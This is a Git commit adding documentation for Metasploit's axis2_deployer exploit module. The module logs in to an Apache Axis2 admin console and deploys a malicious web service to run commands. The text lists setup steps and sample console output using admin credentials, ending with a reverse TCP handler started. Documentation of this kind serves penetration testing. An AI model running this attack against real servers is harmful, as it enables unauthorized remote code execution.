Land rapid7#8148, Add module documentation for axis2_deployer

wchen-r7 · wchen-r7 · commit dfaec8bf3a97 · 2017-03-24T11:55:51.000-05:00
diff --git a/documentation/modules/exploit/multi/http/axis2_deployer.md b/documentation/modules/exploit/multi/http/axis2_deployer.md
@@ -0,0 +1,58 @@
+## Description
+
+This module logs in to an Axis2 Web Admin Module instance using a specific user/pass and uploads and executes commands via deploying a malicious web service by using SOAP.
+
+## Axis2 Web Admin
+
+The Apache Axis2 Web application has three main sections:'Services' lists all the available services deployed in this server, 'Validate' checks the system to see whether all the required libraries are in place and views the system information, and 'Administration' is the Axis2 Web Administration module which is the console for administering the Apache Axis2 installation. The Axis2 Web Administration module provides a way to configure Axis2 dynamically.
+
+**IMPORTANT:** This dynamic configuration will NOT be persistent, i.e., if the servlet container is restarted, then all the dynamic configuration changes will be lost.
+
+## Verification Steps
+
+1. Do: ```use exploit/multi/http/axis2_deployer```
+2. Do: ```set RHOSTS [IP]```
+3. Do: ```set RPORT [PORT]```
+3. Do: ```set USERNAME [Username]```
+4. Do: ```set PASSWORD [Password]```
+5. Do: ```run```
+
+## Sample Output
+
+```
+msf > use exploit/multi/http/axis2_deployer
+msf exploit(axis2_deployer) > set RHOST 10.10.155.37
+RHOST => 10.10.155.37
+msf exploit(axis2_deployer) > set RPORT 8080
+RPORT => 8080
+msf exploit(axis2_deployer) > set USERNAME admin
+USERNAME => admin
+msf exploit(axis2_deployer) > set PASSWORD admin123
+PASSWORD => admin123
+msf exploit(axis2_deployer) > show options
+
+Module options (exploit/multi/http/axis2_deployer):
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   PASSWORD  admin123         no        The password for the specified username
+   PATH      /axis2           yes       The URI path of the axis2 app (use /dswsbobje for SAP BusinessObjects)
+   Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOST     10.10.155.37     yes       The target address
+   RPORT     8080             yes       The target port
+   SSL       false            no        Negotiate SSL/TLS for outgoing connections
+   USERNAME  admin            no        The username to authenticate as
+   VHOST                      no        HTTP server virtual host
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Java
+
+msf exploit(axis2_deployer) > exploit
+
+[*] Started reverse TCP handler on 10.10.155.39:4444 
+
+```
